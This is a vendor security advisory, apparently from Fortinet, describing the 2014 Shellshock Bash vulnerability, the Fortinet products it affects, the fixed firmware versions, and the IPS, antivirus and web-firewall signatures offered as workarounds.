Remote Exploit Vulnerability in Bash - (Shellshock)

Summary

An exploit has been discovered in GNU Bourne Again Shell (Bash) versions 1.14.0 through 4.3. This vulnerability may allow an attacker to remotely execute arbitrary code by crafting special code within an environment variable string. Under certain circumstances, exploitation of this vulnerability can result in unwanted code executing on the vulnerable system.


Update: Mon Sep 29 - This advisory has been updated to include the Bash exploits reported in CVE-2014-6277 and CVE-2014-6273. The updates of affected products will include updates that address all four CVE's reported.


Additional updates will follow.


Update June 1st 2021: The list of impacted products has been updated to include FortiWLC.

Impact Detail

An exploit has been discovered in GNU Bourne Again Shell (Bash) versions 1.14.0 through 4.3. This vulnerability may allow an attacker to remotely execute arbitrary code by crafting special code within an environment variable string.Under certain circumstances, exploitation of this vulnerability can result in unwanted code executing on the vulnerable system.Update: Mon Sep 29 - this advisory has been updated to include the Bash exploits reported in CVE-2014-6277 and CVE-2014-6273. The updates of affected products will include updates that address all four CVE's reported. Additional updates will follow.

Affected Products

FortiAnalyzer version 4.x, 5.0.0 through 5.0.7 and 5.2.0
FortiManager version 4.x, 5.0.0 through 5.0.7 and 5.2.0
FortiAuthenticator version 1.x, 2.x, 3.0.x and 3.1.0 through 3.1.1
Authentication is required to exploit the above 3 products


FortiDB versions 5.0.x, 4.x, 5.1.1 and below
Only 32-bit FortiWLC Wireless Controllers are impacted.
FortiWLC versions 8.x, 8.5.0 through 8.5.3 and 8.6.0

Solutions

FortiAnalyzer


Please upgrade to FortiAnalyzer version 5.2.1 or above
Please upgrade to FortiAnalyzer version 5.0.8 or above


FortiAuthenticator


Please upgrade to FortiAuthenticator version 3.1.2 or above


FortiDB


Please upgrade to FortiDB version 5.1.5 or above


FortiManager


Please upgrade to FortiManager version 5.2.1 or above
Please upgrade to FortiManager version 5.0.8 or above​​​​​​​


FortiWLC


Please upgrade to FortiWLC version 8.5.4 or above.
Please upgrade to FortiWLC version 8.6.1 or above.


Workarounds


FortiGate customers may apply the IPS signature entitled "Bash.Function.Definitions.Remote.Code.Execution" to protect systems accessible through a FortiGate. This IPS signature is available in the 5.552 IPS update, which will be deployed via FDS on the afternoon of September 25th.
FortiGuard Labs has created an AV signature for this vulnerability and it was deployed using the Hot Update functionality. It is advised that all FortiGate customers ensure they are using AV DB 22.863 or later to help protect systems.
FortiGuard Web Security Service for FortiWeb web application firewall was updated overnight to address the Shellshock vulnerability. Updated package 0.00116 includes signature 090420001 to prevent attackers from executing arbitrary commands over HTTP via specially Bash crafted environments (CVE-2014-6271, CVE-2014-7169). FortiWeb inspects signature 090420001 in URLs, arguments, headers and cookies. The signature is part of the Known Exploits directory and is enabled by default.
Please be sure to back up your affected systems prior to update and read the respective release notes when performing any software upgrade. Firmware release dates for impacted products are pending and this advisory will be updated when available.